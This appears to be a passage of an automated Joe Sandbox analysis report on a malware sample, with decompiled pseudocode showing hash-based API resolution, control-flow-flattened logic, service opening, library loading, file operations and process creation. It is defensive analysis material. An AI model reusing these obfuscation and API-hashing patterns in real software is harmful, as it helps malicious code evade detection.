                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 007A0E6C
                                                        • RtlFillMemory.KERNEL32(00000000,?,00000000), ref: 007A0E98
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2271261884.00000000007A0000.00000040.00000001.sdmp, Offset: 007A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7a0000_SampleRes.jbxd
                                                        Similarity
                                                        • API ID: Memory$Move$AllocVirtual$Filllstrcpyn
                                                        • String ID:
                                                        • API String ID: 3581289920-0
                                                        • Opcode ID: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                        • Instruction ID: 38315b78aca035dfb566ee46fbce98c0a7d3bccf98b75486dfb30465404da8a0
                                                        • Opcode Fuzzy Hash: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                        • Instruction Fuzzy Hash: 3331D475A08344ABD714EB60CC58BAB73E9EBCB381F044F2CB54993351D639E881C7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 186 7b8e80-7b8e98 187 7b8ea0-7b8ea5 186->187 188 7b8eab 187->188 189 7b8f7a-7b8f7f 187->189 190 7b8f3f-7b8f46 188->190 191 7b8eb1-7b8eb6 188->191 192 7b9011-7b9016 189->192 193 7b8f85-7b8f8a 189->193 194 7b8f48-7b8f5e call 7b3f00 call 7b3e60 190->194 195 7b8f63-7b8f75 190->195 196 7b901b-7b9022 191->196 197 7b8ebc-7b8ec1 191->197 192->187 198 7b8fce-7b8fd5 193->198 199 7b8f8c-7b8f91 193->199 194->195 195->187 203 7b903f 196->203 204 7b9024-7b903a call 7b3f00 call 7b3e60 196->204 205 7b8efc-7b8f03 197->205 206 7b8ec3-7b8ec8 197->206 201 7b8ff2-7b900c OpenServiceW 198->201 202 7b8fd7-7b8fed call 7b3f00 call 7b3e60 198->202 207 7b8fbb-7b8fc0 199->207 208 7b8f93-7b8fa3 199->208 201->187 202->201 219 7b9042-7b9049 203->219 204->203 212 7b8f20-7b8f2f 205->212 213 7b8f05-7b8f1b call 7b3f00 call 7b3e60 205->213 206->207 216 7b8ece-7b8ed5 206->216 207->187 209 7b8fc6-7b8fcd 207->209 217 7b8fae-7b8fb6 208->217 218 7b8fa5-7b8fac 208->218 212->219 237 7b8f35-7b8f3a 212->237 213->212 224 7b8ef2-7b8efa 216->224 225 7b8ed7-7b8eed call 7b3f00 call 7b3e60 216->225 217->187 218->217 218->218 224->187 225->224 237->187
                                                        C-Code - Quality: 66%
                                                        			E007B8E80() {
                                                        				short* _v4;
                                                        				void* __ebx;
                                                        				void* __ecx;
                                                        				void* __ebp;
                                                        				void* _t4;
                                                        				void* _t6;
                                                        				intOrPtr* _t11;
                                                        				intOrPtr* _t15;
                                                        				intOrPtr* _t19;
                                                        				intOrPtr* _t22;
                                                        				void* _t25;
                                                        				void* _t42;
                                                        				short* _t43;
                                                        				intOrPtr _t44;
                                                        				short* _t45;
                                                        				void* _t46;
                                                        				void* _t47;
                                                        
                                                        				_t25 = _v4;
                                                        				_t4 = 0x1779a150;
                                                        				_t46 = _v4;
                                                        				_t43 = _v4;
                                                        				_t42 = 0;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t47 = _t4 - 0xebfcc22;
                                                        						if(_t47 <= 0) {
                                                        							break;
                                                        						}
                                                        						if(_t4 == 0x1779a150) {
                                                        							_t4 = 0x23287775;
                                                        							continue;
                                                        						} else {
                                                        							if(_t4 == 0x1e3d7119) {
                                                        								if( *0x7be270 == 0) {
                                                        									 *0x7be270 = E007B3E60(_t25, E007B3F00(0x26f5757c), 0x56e230f9, _t46);
                                                        								}
                                                        								_t6 = OpenServiceW(_t46, _t43, 0x10000); // executed
                                                        								_t25 = _t6;
                                                        								_t4 =  !=  ? 0xebfcc22 : 0xbf6010;
                                                        								continue;
                                                        							} else {
                                                        								if(_t4 != 0x23287775) {
                                                        									goto L22;
                                                        								} else {
                                                        									_t44 =  *0x7be54c; // 0x54e0e0
                                                        									_t45 = _t44 + 0x260;
                                                        									while( *_t45 != 0x5c) {
                                                        										_t45 = _t45 + 2;
                                                        									}
                                                        									_t43 = _t45 + 2;
                                                        									_t4 = 0x10ada17;
                                                        									continue;
                                                        								}
                                                        							}
                                                        						}
                                                        						L32:
                                                        					}
                                                        					if(_t47 == 0) {
                                                        						_t11 =  *0x7be4c8;
                                                        						if(_t11 == 0) {
                                                        							_t11 = E007B3E60(_t25, E007B3F00(0x26f5757c), 0xe9d3e51f, _t46);
                                                        							 *0x7be4c8 = _t11;
                                                        						}
                                                        						 *_t11(_t25);
                                                        						_t42 =  !=  ? 1 : _t42;
                                                        						_t4 = 0xd10de09;
                                                        						goto L1;
                                                        					} else {
                                                        						if(_t4 == 0xbf6010) {
                                                        							_t15 =  *0x7be18c;
                                                        							if(_t15 == 0) {
                                                        								_t15 = E007B3E60(_t25, E007B3F00(0x26f5757c), 0x268fe5f0, _t46);
                                                        								 *0x7be18c = _t15;
                                                        							}
                                                        							 *_t15(_t46);
                                                        							goto L31;
                                                        						} else {
                                                        							if(_t4 == 0x10ada17) {
                                                        								_t19 =  *0x7be310;
                                                        								if(_t19 == 0) {
                                                        									_t19 = E007B3E60(_t25, E007B3F00(0x26f5757c), 0x9ba7cd1, _t46);
                                                        									 *0x7be310 = _t19;
                                                        								}
                                                        								_t46 =  *_t19(0, 0, 0xf003f);
                                                        								if(_t46 == 0) {
                                                        									L31:
                                                        									return _t42;
                                                        								} else {
                                                        									_t4 = 0x1e3d7119;
                                                        									goto L1;
                                                        								}
                                                        							} else {
                                                        								if(_t4 != 0xd10de09) {
                                                        									goto L22;
                                                        								} else {
                                                        									_t22 =  *0x7be18c;
                                                        									if(_t22 == 0) {
                                                        										_t22 = E007B3E60(_t25, E007B3F00(0x26f5757c), 0x268fe5f0, _t46);
                                                        										 *0x7be18c = _t22;
                                                        									}
                                                        									 *_t22(_t25);
                                                        									_t4 = 0xbf6010;
                                                        									goto L1;
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L32;
                                                        					L22:
                                                        				} while (_t4 != 0x2dd4caa9);
                                                        				return _t42;
                                                        				goto L32;
                                                        			}




















                                                        0x007b8e82
                                                        0x007b8e86
                                                        0x007b8e8c
                                                        0x007b8e91
                                                        0x007b8e96
                                                        0x007b8e98
                                                        0x007b8ea0
                                                        0x007b8ea0
                                                        0x007b8ea0
                                                        0x007b8ea0
                                                        0x007b8ea5
                                                        0x00000000
                                                        0x00000000
                                                        0x007b8f7f
                                                        0x007b9011
                                                        0x00000000
                                                        0x007b8f85
                                                        0x007b8f8a
                                                        0x007b8fd5
                                                        0x007b8fed
                                                        0x007b8fed
                                                        0x007b8ff9
                                                        0x007b8ffb
                                                        0x007b9009
                                                        0x00000000
                                                        0x007b8f8c
                                                        0x007b8f91
                                                        0x00000000
                                                        0x007b8f93
                                                        0x007b8f93
                                                        0x007b8f99
                                                        0x007b8fa3
                                                        0x007b8fa5
                                                        0x007b8fa8
                                                        0x007b8fae
                                                        0x007b8fb1
                                                        0x00000000
                                                        0x007b8fb1
                                                        0x007b8f91
                                                        0x007b8f8a
                                                        0x00000000
                                                        0x007b8f7f
                                                        0x007b8eab
                                                        0x007b8f3f
                                                        0x007b8f46
                                                        0x007b8f59
                                                        0x007b8f5e
                                                        0x007b8f5e
                                                        0x007b8f64
                                                        0x007b8f6d
                                                        0x007b8f70
                                                        0x00000000
                                                        0x007b8eb1
                                                        0x007b8eb6
                                                        0x007b901b
                                                        0x007b9022
                                                        0x007b9035
                                                        0x007b903a
                                                        0x007b903a
                                                        0x007b9040
                                                        0x00000000
                                                        0x007b8ebc
                                                        0x007b8ec1
                                                        0x007b8efc
                                                        0x007b8f03
                                                        0x007b8f16
                                                        0x007b8f1b
                                                        0x007b8f1b
                                                        0x007b8f2b
                                                        0x007b8f2f
                                                        0x007b9042
                                                        0x007b9049
                                                        0x007b8f35
                                                        0x007b8f35
                                                        0x00000000
                                                        0x007b8f35
                                                        0x007b8ec3
                                                        0x007b8ec8
                                                        0x00000000
                                                        0x007b8ece
                                                        0x007b8ece
                                                        0x007b8ed5
                                                        0x007b8ee8
                                                        0x007b8eed
                                                        0x007b8eed
                                                        0x007b8ef3
                                                        0x007b8ef5
                                                        0x00000000
                                                        0x007b8ef5
                                                        0x007b8ec8
                                                        0x007b8ec1
                                                        0x007b8eb6
                                                        0x00000000
                                                        0x007b8fbb
                                                        0x007b8fbb
                                                        0x007b8fcd
                                                        0x00000000

                                                        APIs
                                                        • OpenServiceW.ADVAPI32(3251FEFE,?,00010000,?,3251FEFE,?,186D334D,0054E0E0,007B8782,?,3251FEFE,?), ref: 007B8FF9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2271279815.00000000007B1000.00000020.00000001.sdmp, Offset: 007B0000, based on PE: true
                                                        • Associated: 0000000A.00000002.2271273797.00000000007B0000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000A.00000002.2271290366.00000000007BD000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000A.00000002.2271300426.00000000007BF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7b0000_SampleRes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: OpenService
                                                        • String ID: uw(#$uw(#$T
                                                        • API String ID: 3098006287-2223906957
                                                        • Opcode ID: ae6691e3961f7db67d7f86c340ba20e9cd9ddb54f66d901674c3d7957d4725f1
                                                        • Instruction ID: 44ca5a14f46745a62e846e7927482fd0f9e29136575c12f6a8ab8794597b6934
                                                        • Opcode Fuzzy Hash: ae6691e3961f7db67d7f86c340ba20e9cd9ddb54f66d901674c3d7957d4725f1
                                                        • Instruction Fuzzy Hash: 7A41D821B04205DFDB646BBC9C847FA22DAA784750F604929F546CB741EE7CDC808797
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 241 7b7120 242 7b7125-7b712a 241->242 243 7b7130 242->243 244 7b71b4-7b71b9 242->244 245 7b7233-7b7248 call 7b34c0 243->245 246 7b7136-7b713b 243->246 247 7b71bb 244->247 248 7b7207-7b720c 244->248 271 7b724a-7b7260 call 7b3f00 call 7b3e60 245->271 272 7b7265-7b7278 LoadLibraryW 245->272 251 7b713d 246->251 252 7b7190-7b7195 246->252 254 7b71ee-7b7202 call 7b7080 247->254 255 7b71bd-7b71c2 247->255 249 7b720e-7b7222 call 7b7080 248->249 250 7b7227-7b722c 248->250 249->242 250->242 259 7b7232 250->259 260 7b717a-7b718e call 7b7080 251->260 261 7b713f-7b7144 251->261 252->250 258 7b719b-7b71af call 7b7080 252->258 254->242 263 7b71d5-7b71e9 call 7b7080 255->263 264 7b71c4-7b71c9 255->264 258->242 260->242 269 7b7146-7b714b 261->269 270 7b7164-7b7178 call 7b7080 261->270 263->242 264->250 273 7b71cb-7b71d0 264->273 269->250 279 7b7151-7b7162 call 7b7080 269->279 270->242 271->272 275 7b727a-7b7290 call 7b3f00 call 7b3e60 272->275 276 7b7295-7b72a0 272->276 273->242 275->276 292 7b72bd-7b72c5 276->292 293 7b72a2-7b72b8 call 7b3f00 call 7b3e60 276->293 279->242 293->292
                                                        C-Code - Quality: 85%
                                                        			E007B7120(void* __ebx) {
                                                        				void* _t2;
                                                        				struct HINSTANCE__* _t8;
                                                        				intOrPtr* _t9;
                                                        				intOrPtr* _t11;
                                                        				void* _t21;
                                                        				intOrPtr _t23;
                                                        				void* _t48;
                                                        				WCHAR* _t51;
                                                        				void* _t53;
                                                        				void* _t54;
                                                        				void* _t55;
                                                        
                                                        				_t21 = __ebx;
                                                        				_t2 = 0x291da748;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t54 = _t2 - 0x1a8031ec;
                                                        						if(_t54 > 0) {
                                                        							break;
                                                        						}
                                                        						if(_t54 == 0) {
                                                        							_t51 = E007B34C0(0x7bd830);
                                                        							__eflags =  *0x7bdd1c;
                                                        							if( *0x7bdd1c == 0) {
                                                        								 *0x7bdd1c = E007B3E60(_t21, E007B3F00(0x9bab0b12), 0xe4b28d97, _t53);
                                                        							}
                                                        							_t8 = LoadLibraryW(_t51);
                                                        							_t23 =  *0x7be548; // 0x587e58
                                                        							 *(_t23 + 0x4c) = _t8;
                                                        							_t9 =  *0x7be494;
                                                        							__eflags = _t9;
                                                        							if(_t9 == 0) {
                                                        								_t9 = E007B3E60(_t21, E007B3F00(0x9bab0b12), 0x7facde30, _t53);
                                                        								 *0x7be494 = _t9;
                                                        							}
                                                        							_t48 =  *_t9();
                                                        							_t11 =  *0x7bdf30;
                                                        							__eflags = _t11;
                                                        							if(_t11 == 0) {
                                                        								_t11 = E007B3E60(_t21, E007B3F00(0x9bab0b12), 0x5010a54d, _t53);
                                                        								 *0x7bdf30 = _t11;
                                                        							}
                                                        							return  *_t11(_t48, 0, _t51);
                                                        						} else {
                                                        							_t55 = _t2 - 0x185e9846;
                                                        							if(_t55 > 0) {
                                                        								__eflags = _t2 - 0x18843476;
                                                        								if(__eflags != 0) {
                                                        									goto L21;
                                                        								} else {
                                                        									E007B7080(_t21, 0x7bd7a0, 4, __eflags);
                                                        									_t2 = 0x2eb73d4f;
                                                        									continue;
                                                        								}
                                                        							} else {
                                                        								if(_t55 == 0) {
                                                        									E007B7080(_t21, 0x7bd8f0, 2, __eflags);
                                                        									_t2 = 0x9da2520;
                                                        									continue;
                                                        								} else {
                                                        									if(_t2 == 0x9da2520) {
                                                        										E007B7080(_t21, 0x7bd800, 3, __eflags);
                                                        										_t2 = 0x18843476;
                                                        										continue;
                                                        									} else {
                                                        										_t57 = _t2 - 0x15a7f569;
                                                        										if(_t2 != 0x15a7f569) {
                                                        											goto L21;
                                                        										} else {
                                                        											E007B7080(_t21, 0x7bd860, 0, _t57);
                                                        											_t2 = 0x39797244;
                                                        											continue;
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L30:
                                                        					}
                                                        					__eflags = _t2 - 0x2eb73d4f;
                                                        					if(__eflags > 0) {
                                                        						__eflags = _t2 - 0x39797244;
                                                        						if(__eflags != 0) {
                                                        							goto L21;
                                                        						} else {
                                                        							E007B7080(_t21, 0x7bd890, 1, __eflags);
                                                        							_t2 = 0x185e9846;
                                                        							goto L1;
                                                        						}
                                                        					} else {
                                                        						if(__eflags == 0) {
                                                        							E007B7080(_t21, 0x7bd7e0, 5, __eflags);
                                                        							_t2 = 0x22a44863;
                                                        							goto L1;
                                                        						} else {
                                                        							__eflags = _t2 - 0x22a44863;
                                                        							if(__eflags == 0) {
                                                        								E007B7080(_t21, 0x7bd8c0, 6, __eflags);
                                                        								_t2 = 0x1a8031ec;
                                                        								goto L1;
                                                        							} else {
                                                        								__eflags = _t2 - 0x291da748;
                                                        								if(__eflags != 0) {
                                                        									goto L21;
                                                        								} else {
                                                        									_t2 = 0x15a7f569;
                                                        									goto L1;
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L30;
                                                        					L21:
                                                        					__eflags = _t2 - 0x21acdd7e;
                                                        				} while (__eflags != 0);
                                                        				return _t2;
                                                        				goto L30;
                                                        			}














                                                        0x007b7120
                                                        0x007b7120
                                                        0x007b7120
                                                        0x007b7125
                                                        0x007b7125
                                                        0x007b7125
                                                        0x007b7125
                                                        0x007b712a
                                                        0x00000000
                                                        0x00000000
                                                        0x007b7130
                                                        0x007b723f
                                                        0x007b7246
                                                        0x007b7248
                                                        0x007b7260
                                                        0x007b7260
                                                        0x007b7266
                                                        0x007b7268
                                                        0x007b726e
                                                        0x007b7271
                                                        0x007b7276
                                                        0x007b7278
                                                        0x007b728b
                                                        0x007b7290
                                                        0x007b7290
                                                        0x007b7297
                                                        0x007b7299
                                                        0x007b729e
                                                        0x007b72a0
                                                        0x007b72b3
                                                        0x007b72b8
                                                        0x007b72b8
                                                        0x007b72c5
                                                        0x007b7136
                                                        0x007b7136
                                                        0x007b713b
                                                        0x007b7190
                                                        0x007b7195
                                                        0x00000000
                                                        0x007b719b
                                                        0x007b71a5
                                                        0x007b71aa
                                                        0x00000000
                                                        0x007b71aa
                                                        0x007b713d
                                                        0x007b713d
                                                        0x007b7184
                                                        0x007b7189
                                                        0x00000000
                                                        0x007b713f
                                                        0x007b7144
                                                        0x007b716e
                                                        0x007b7173
                                                        0x00000000
                                                        0x007b7146
                                                        0x007b7146
                                                        0x007b714b
                                                        0x00000000
                                                        0x007b7151
                                                        0x007b7158
                                                        0x007b715d
                                                        0x00000000
                                                        0x007b715d
                                                        0x007b714b
                                                        0x007b7144
                                                        0x007b713d
                                                        0x007b713b
                                                        0x00000000
                                                        0x007b7130
                                                        0x007b71b4
                                                        0x007b71b9
                                                        0x007b7207
                                                        0x007b720c
                                                        0x00000000
                                                        0x007b720e
                                                        0x007b7218
                                                        0x007b721d
                                                        0x00000000
                                                        0x007b721d
                                                        0x007b71bb
                                                        0x007b71bb
                                                        0x007b71f8
                                                        0x007b71fd
                                                        0x00000000
                                                        0x007b71bd
                                                        0x007b71bd
                                                        0x007b71c2
                                                        0x007b71df
                                                        0x007b71e4
                                                        0x00000000
                                                        0x007b71c4
                                                        0x007b71c4
                                                        0x007b71c9
                                                        0x00000000
                                                        0x007b71cb
                                                        0x007b71cb
                                                        0x00000000
                                                        0x007b71cb
                                                        0x007b71c9
                                                        0x007b71c2
                                                        0x007b71bb
                                                        0x00000000
                                                        0x007b7227
                                                        0x007b7227
                                                        0x007b7227
                                                        0x007b7232
                                                        0x00000000

                                                        APIs
                                                        • LoadLibraryW.KERNEL32(00000000,?,3251FEFE,007B68AC), ref: 007B7266
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2271279815.00000000007B1000.00000020.00000001.sdmp, Offset: 007B0000, based on PE: true
                                                        • Associated: 0000000A.00000002.2271273797.00000000007B0000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000A.00000002.2271290366.00000000007BD000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000A.00000002.2271300426.00000000007BF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7b0000_SampleRes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID: Dry9$Dry9$X~X
                                                        • API String ID: 1029625771-3144349131
                                                        • Opcode ID: 057807b7207e09893caae9793401d94042cc3ac17cfdcd00ae6eaaafd220a93d
                                                        • Instruction ID: b1f7473f07a95f1b1e582a801d6b02eebc51548078005143a9470c6c35b3e05b
                                                        • Opcode Fuzzy Hash: 057807b7207e09893caae9793401d94042cc3ac17cfdcd00ae6eaaafd220a93d
                                                        • Instruction Fuzzy Hash: 7B319020B0D10887DA3C6ABE58A97FE11BAE7E0304B604476F151CB795ED2ECD42C3A6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 301 7b3780-7b3793 302 7b37b0-7b37c5 301->302 303 7b3795-7b37ab call 7b3f00 call 7b3e60 301->303 308 7b37e2-7b37fa 302->308 309 7b37c7-7b37dd call 7b3f00 call 7b3e60 302->309 303->302 314 7b37fc-7b3812 call 7b3f00 call 7b3e60 308->314 315 7b3817-7b3832 308->315 309->308 314->315 322 7b384f-7b385e 315->322 323 7b3834-7b384a call 7b3f00 call 7b3e60 315->323 328 7b387b-7b38b4 322->328 329 7b3860-7b3876 call 7b3f00 call 7b3e60 322->329 323->322 336 7b38d1-7b38e2 SHFileOperationW 328->336 337 7b38b6-7b38cc call 7b3f00 call 7b3e60 328->337 329->328 337->336
                                                        C-Code - Quality: 62%
                                                        			E007B3780(void* __ecx, void* __edx, void* __edi, void* __esi) {
                                                        				char _v520;
                                                        				char _v528;
                                                        				char _v536;
                                                        				char _v1040;
                                                        				char _v1056;
                                                        				short _v1072;
                                                        				char* _v1076;
                                                        				char* _v1080;
                                                        				intOrPtr _v1084;
                                                        				intOrPtr* _t12;
                                                        				intOrPtr* _t14;
                                                        				intOrPtr* _t16;
                                                        				intOrPtr* _t18;
                                                        				intOrPtr* _t20;
                                                        				signed int _t26;
                                                        				void* _t36;
                                                        				void* _t63;
                                                        				void* _t66;
                                                        				void* _t69;
                                                        				void* _t70;
                                                        				void* _t71;
                                                        				void* _t72;
                                                        				struct _SHFILEOPSTRUCTW* _t73;
                                                        
                                                        				_t70 =  &_v1072;
                                                        				_t12 =  *0x7bddc0;
                                                        				_t66 = __ecx;
                                                        				_t63 = __edx;
                                                        				if(_t12 == 0) {
                                                        					_t12 = E007B3E60(_t36, E007B3F00(0xc6fbcd74), 0x7e0ae558, _t69);
                                                        					 *0x7bddc0 = _t12;
                                                        				}
                                                        				 *_t12( &_v1072, 0, 0x1e);
                                                        				_t14 =  *0x7bddc0;
                                                        				_t71 = _t70 + 0xc;
                                                        				if(_t14 == 0) {
                                                        					_t14 = E007B3E60(_t36, E007B3F00(0xc6fbcd74), 0x7e0ae558, _t69);
                                                        					 *0x7bddc0 = _t14;
                                                        				}
                                                        				 *_t14( &_v1040, 0, 0x208);
                                                        				_t16 =  *0x7bddc0;
                                                        				_t72 = _t71 + 0xc;
                                                        				if(_t16 == 0) {
                                                        					_t16 = E007B3E60(_t36, E007B3F00(0xc6fbcd74), 0x7e0ae558, _t69);
                                                        					 *0x7bddc0 = _t16;
                                                        				}
                                                        				 *_t16( &_v520, 0, 0x208);
                                                        				_t18 =  *0x7be298;
                                                        				_t73 = _t72 + 0xc;
                                                        				if(_t18 == 0) {
                                                        					_t18 = E007B3E60(_t36, E007B3F00(0x9bab0b12), 0xba782e65, _t69);
                                                        					 *0x7be298 = _t18;
                                                        				}
                                                        				 *_t18( &_v1040, _t66);
                                                        				_t20 =  *0x7be298;
                                                        				if(_t20 == 0) {
                                                        					_t20 = E007B3E60(_t36, E007B3F00(0x9bab0b12), 0xba782e65, _t69);
                                                        					 *0x7be298 = _t20;
                                                        				}
                                                        				 *_t20( &_v528, _t63);
                                                        				_v1084 = 1;
                                                        				_v1080 =  &_v1056;
                                                        				_v1076 =  &_v536;
                                                        				_v1072 = 0xe14;
                                                        				if( *0x7be30c == 0) {
                                                        					 *0x7be30c = E007B3E60(_t36, E007B3F00(0xd9518805), 0x262a6194, _t69);
                                                        				}
                                                        				_t26 = SHFileOperationW(_t73); // executed
                                                        				asm("sbb eax, eax");
                                                        				return  ~_t26 + 1;
                                                        			}


























                                                        0x007b3785
                                                        0x007b3780
                                                        0x007b378c
                                                        0x007b378f
                                                        0x007b3793
                                                        0x007b37a6
                                                        0x007b37ab
                                                        0x007b37ab
                                                        0x007b37b9
                                                        0x007b37bb
                                                        0x007b37c0
                                                        0x007b37c5
                                                        0x007b37d8
                                                        0x007b37dd
                                                        0x007b37dd
                                                        0x007b37ee
                                                        0x007b37f0
                                                        0x007b37f5
                                                        0x007b37fa
                                                        0x007b380d
                                                        0x007b3812
                                                        0x007b3812
                                                        0x007b3826
                                                        0x007b3828
                                                        0x007b382d
                                                        0x007b3832
                                                        0x007b3845
                                                        0x007b384a
                                                        0x007b384a
                                                        0x007b3855
                                                        0x007b3857
                                                        0x007b385e
                                                        0x007b3871
                                                        0x007b3876
                                                        0x007b3876
                                                        0x007b3884
                                                        0x007b388a
                                                        0x007b3892
                                                        0x007b389d
                                                        0x007b38a6
                                                        0x007b38b4
                                                        0x007b38cc
                                                        0x007b38cc
                                                        0x007b38d5
                                                        0x007b38d9
                                                        0x007b38e2

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2271279815.00000000007B1000.00000020.00000001.sdmp, Offset: 007B0000, based on PE: true
                                                        • Associated: 0000000A.00000002.2271273797.00000000007B0000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000A.00000002.2271290366.00000000007BD000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000A.00000002.2271300426.00000000007BF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7b0000_SampleRes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileOperation
                                                        • String ID: X~$X~$X~
                                                        • API String ID: 3080627654-3258893172
                                                        • Opcode ID: c949cd984748a80fbb0f3577a28565055ee9e5cf4712ad33b3790d03b77b0134
                                                        • Instruction ID: c5681c0624e206fd16d5bbe9dad6ffb5a565f01fee435bb001258695a1627cc3
                                                        • Opcode Fuzzy Hash: c949cd984748a80fbb0f3577a28565055ee9e5cf4712ad33b3790d03b77b0134
                                                        • Instruction Fuzzy Hash: F331BC707002018BD724ABB9DC55BEB37EAAB84704F008A2EB855CB291FA3CDE418795
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 343 7b4b70-7b4b80 344 7b4b9d-7b4bba 343->344 345 7b4b82-7b4b98 call 7b3f00 call 7b3e60 343->345 349 7b4bbc-7b4bd2 call 7b3f00 call 7b3e60 344->349 350 7b4bd7-7b4bf5 CreateProcessW 344->350 345->344 349->350 353 7b4c73-7b4c7a 350->353 354 7b4bf7-7b4bfd 350->354 357 7b4bff-7b4c13 354->357 358 7b4c14-7b4c1b 354->358 360 7b4c38-7b4c45 358->360 361 7b4c1d-7b4c33 call 7b3f00 call 7b3e60 358->361 366 7b4c62-7b4c72 360->366 367 7b4c47-7b4c5d call 7b3f00 call 7b3e60 360->367 361->360 367->366
                                                        C-Code - Quality: 60%
                                                        			E007B4B70(void* __ebx, WCHAR* __ecx, WCHAR* __edx, void* __ebp, int _a4, intOrPtr _a12) {
                                                        				struct _STARTUPINFOW _v72;
                                                        				struct _PROCESS_INFORMATION _v88;
                                                        				intOrPtr* _t9;
                                                        				int _t12;
                                                        				intOrPtr* _t15;
                                                        				intOrPtr* _t17;
                                                        				WCHAR* _t44;
                                                        				WCHAR* _t45;
                                                        
                                                        				_t46 = __ebp;
                                                        				_t26 = __ebx;
                                                        				_t9 =  *0x7bddc0;
                                                        				_t45 = __edx;
                                                        				_t44 = __ecx;
                                                        				if(_t9 == 0) {
                                                        					_t9 = E007B3E60(__ebx, E007B3F00(0xc6fbcd74), 0x7e0ae558, __ebp);
                                                        					 *0x7bddc0 = _t9;
                                                        				}
                                                        				 *_t9( &_v72, 0, 0x44);
                                                        				_v72.cb = 0x44;
                                                        				if( *0x7be21c == 0) {
                                                        					 *0x7be21c = E007B3E60(_t26, E007B3F00(0x9bab0b12), 0xbd6cc871, _t46);
                                                        				}
                                                        				_t12 = CreateProcessW(_t44, _t45, 0, 0, _a4, 0, 0, 0,  &_v72,  &_v88); // executed
                                                        				if(_t12 == 0) {
                                                        					return 0;
                                                        				} else {
                                                        					if(_a12 == 0) {
                                                        						_t15 =  *0x7bde3c;
                                                        						if(_t15 == 0) {
                                                        							_t15 = E007B3E60(_t26, E007B3F00(0x9bab0b12), 0x20de7595, _t46);
                                                        							 *0x7bde3c = _t15;
                                                        						}
                                                        						 *_t15(_v88.hProcess);
                                                        						_t17 =  *0x7bde3c;
                                                        						if(_t17 == 0) {
                                                        							_t17 = E007B3E60(_t26, E007B3F00(0x9bab0b12), 0x20de7595, _t46);
                                                        							 *0x7bde3c = _t17;
                                                        						}
                                                        						 *_t17(_v88.hProcess);
                                                        						return 1;
                                                        					} else {
                                                        						asm("movdqu xmm0, [esp+0x8]");
                                                        						asm("movdqu [eax], xmm0");
                                                        						return 1;
                                                        					}
                                                        				}
                                                        			}











                                                        0x007b4b70
                                                        0x007b4b70
                                                        0x007b4b70
                                                        0x007b4b79
                                                        0x007b4b7c
                                                        0x007b4b80
                                                        0x007b4b93
                                                        0x007b4b98
                                                        0x007b4b98
                                                        0x007b4ba6
                                                        0x007b4bb0
                                                        0x007b4bba
                                                        0x007b4bd2
                                                        0x007b4bd2
                                                        0x007b4bf1
                                                        0x007b4bf5
                                                        0x007b4c7a
                                                        0x007b4bf7
                                                        0x007b4bfd
                                                        0x007b4c14
                                                        0x007b4c1b
                                                        0x007b4c2e
                                                        0x007b4c33
                                                        0x007b4c33
                                                        0x007b4c3c
                                                        0x007b4c3e
                                                        0x007b4c45
                                                        0x007b4c58
                                                        0x007b4c5d
                                                        0x007b4c5d
                                                        0x007b4c66
                                                        0x007b4c72
                                                        0x007b4bff
                                                        0x007b4bff
                                                        0x007b4c05
                                                        0x007b4c13
                                                        0x007b4c13
                                                        0x007b4bfd

                                                        APIs
                                                        • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 007B4BF1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2271279815.00000000007B1000.00000020.00000001.sdmp, Offset: 007B0000, based on PE: true
                                                        • Associated: 0000000A.00000002.2271273797.00000000007B0000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000A.00000002.2271290366.00000000007BD000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000A.00000002.2271300426.00000000007BF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7b0000_SampleRes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID: D$X~
                                                        • API String ID: 963392458-2090554203
                                                        • Opcode ID: ff3a2a27c378dfd3a74e106611e12034dfe14fd076bef55b48d525b46ae76988
